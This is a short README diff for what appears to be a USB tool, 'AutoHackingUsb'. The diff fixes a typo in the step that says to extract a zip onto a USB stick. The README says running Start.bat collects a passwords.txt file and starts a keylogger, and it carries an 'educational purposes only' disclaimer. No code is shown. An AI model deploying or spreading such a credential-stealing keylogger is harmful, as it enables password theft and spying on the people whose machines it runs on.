xyse/AutoHackingUsb/README.md

 For educational purposes only.

-Extrahate the USBhack1.0.zip on a usb stick. (download in description)
+Extract the USBhack1.0.zip on a usb stick. (download in description)

 For getting the passwords.txt and starting the keylogger just start Start.bat